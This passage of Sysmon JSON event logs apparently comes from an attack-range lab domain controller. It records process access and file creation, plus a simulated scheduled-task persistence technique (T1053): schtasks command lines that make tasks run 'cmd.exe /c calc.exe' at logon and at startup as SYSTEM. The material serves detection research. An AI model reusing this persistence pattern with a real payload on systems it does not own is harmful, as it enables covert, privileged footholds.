C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.166","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001019560800}","TargetProcessId":"3212","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5702,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.166\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.166","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001019560800}","TargetProcessId":"3212","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5703,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.166\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.166","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001019560800}","TargetProcessId":"3212","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5704,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: T1053\r\nUtcTime: 2020-08-01 06:55:19.166\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\System32\\Tasks\\T1053_005_OnLogon\r\nCreationUtcTime: 2020-08-01 06:55:19.166","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"T1053","UtcTime":"2020-08-01 06:55:19.166","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetFilename":"C:\\Windows\\System32\\Tasks\\T1053_005_OnLogon","CreationUtcTime":"2020-08-01 06:55:19.166","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5705,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.187\r\nProcessGuid: {E2A3D6B1-11D7-5F25-0000-0010F6570800}\r\nProcessId: 2604\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sctasks.exe\r\nCommandLine: schtasks  /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F\r\nParentProcessGuid: {E2A3D6B1-11D7-5F25-0000-001068550800}\r\nParentProcessId: 4924\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\" & schtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.187","ProcessGuid":"{E2A3D6B1-11D7-5F25-0000-0010F6570800}","Image":"C:\\Windows\\System32\\schtasks.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Task Scheduler Configuration Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"sctasks.exe","CommandLine":"schtasks  /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F","ParentProcessGuid":"{E2A3D6B1-11D7-5F25-0000-001068550800}","ParentProcessId":"4924","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\" &amp; schtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\" ","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5706,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-11D7-5F25-0000-001068550800}\r\nSourceProcessId: 4924\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010F6570800}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001068550800}","SourceProcessId":"4924","SourceThreadId":"4104","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010F6570800}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5707,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010F6570800}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010F6570800}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5708,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5709,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5710,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 